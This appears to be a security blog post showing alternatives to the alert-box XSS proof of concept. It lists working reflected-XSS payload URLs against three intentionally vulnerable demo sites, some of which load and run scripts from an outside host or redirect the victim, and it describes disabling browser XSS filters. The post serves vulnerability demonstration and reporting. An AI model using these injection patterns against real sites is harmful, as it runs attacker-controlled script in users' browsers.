Alternatives to the Boring XSS Alert Box

Demonstrating that a web application is vulnerable to reflected cross-site scripting (XSS) is not very exciting.  It's always kind of like, "oh hey, look here, an alert box popped up when you clicked on that link".  Scary.  Dramatic. Not!  I was looking for more interesting ways to show how XSS could be used.  I figure the code is more likely to get fixed if you can make a memorable impression.  I came up with a few options. 

I'll present these techniques using 3 websites that are Internet facing and purposefully built to be susceptible to reflected XSS.

1. demo.testfire.net (operated by IBM)
2. www.webscantest.com (NT Objectives)
3. testasp.vulnweb.com (Acunetix)

All of the URLs here were tested successfully with Firefox 26, IE 11 with the XSS Filter disabled, and Chrome 31 with the "--disable-xss-auditor" command line option.  Note - if you have the NoScript extension, you'll have to either disable it temporarily -or- allow scripts on the above domains plus sc0rn.com and disable the XSS protection.

First, there is the boring alert box that I'm trying to get away from:

• http://demo.testfire.net/search.aspx?txtSearch=%3Cscript%3Ealert('xss')%3C%2Fscript%3E
• http://www.webscantest.com/crosstraining/search.php?q=%22%3E%3Cscript%3Ealert('xss')%3C%2Fscript%3E%%3Cfont%20color%3D%22white
• http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cscript%3Ealert('xss')%3C%2Fscript%3E

Alternative #1 is to fill the victim's screen with unicorns and rainbows.

• http://demo.testfire.net/search.aspx?txtSearch=%3Cscript%20src=%22http://sc0rn.com/cfy.js%22%3E%3C%2Fscript%3E
• http://www.webscantest.com/crosstraining/search.php?q=%22%3E%3Cscript%20src=%22http://sc0rn.com/cfy.js%22%3E%3C%2Fscript%3E%3Cfont%20color%3d%22white
• http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cscript%20src=%22http://sc0rn.com/cfy.js%22%3E%3C%2Fscript%3E

Alternative #2 is to Rickroll the victim (i.e., redirect to Rick Astley's famous 80's music video).

• http://demo.testfire.net/search.aspx?txtSearch=%3Cscript%3Elocation.href=%22http://goo.gl/z4LTEG%22;%3C%2Fscript%3E
• http://www.webscantest.com/crosstraining/search.php?q=%22%3E%3Cscript%3Elocation.href=%22http://goo.gl/z4LTEG%22;%3C%2Fscript%3E%3Cfont%20color%3d%22white
• http://testasp.vulnweb.com/Search.asp?tfSearch==%3Cscript%3Elocation.href=%22http://goo.gl/z4LTEG%22;%3C%2Fscript%3E

Alternative #3 is to display some HTML... a funny news story in this case. (in Firefox w/NoScript you may have to click refresh for this to work)

• http://demo.testfire.net/search.aspx?txtSearch=%3Cscript%20src=%22http://sc0rn.com/sc.js%22%3E%3C%2Fscript%3E
• http://www.webscantest.com/crosstraining/search.php?q=%22%3E%3Cscript%20src=%22http://sc0rn.com/sc.js%22%3E%3C%2Fscript%3E%3Cfont%20color%3d%22white
• http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cscript%20src=%22http://sc0rn.com/sc.js%22%3E%3C%2Fscript%3E

Feel free to use these or create your own.  I think you'll agree these are definitely better than popping an alert box.

Lastly, I have a hilarious, but mildly racy (NSFW?) alternative. (in Firefox w/NoScript you may have to click refresh for this to work)

• http://demo.testfire.net/search.aspx?txtSearch=%3Cscript%20src=%22http://sc0rn.com/nip.js%22%3E%3C%2Fscript%3E
• http://www.webscantest.com/crosstraining/search.php?q=%22%3E%3Cscript%20src=%22http://sc0rn.com/nip.js%22%3E%3C%2Fscript%3E%3Cfont%20color%3d%22white
• http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cscript%20src=%22http://sc0rn.com/nip.js%22%3E%3C%2Fscript%3E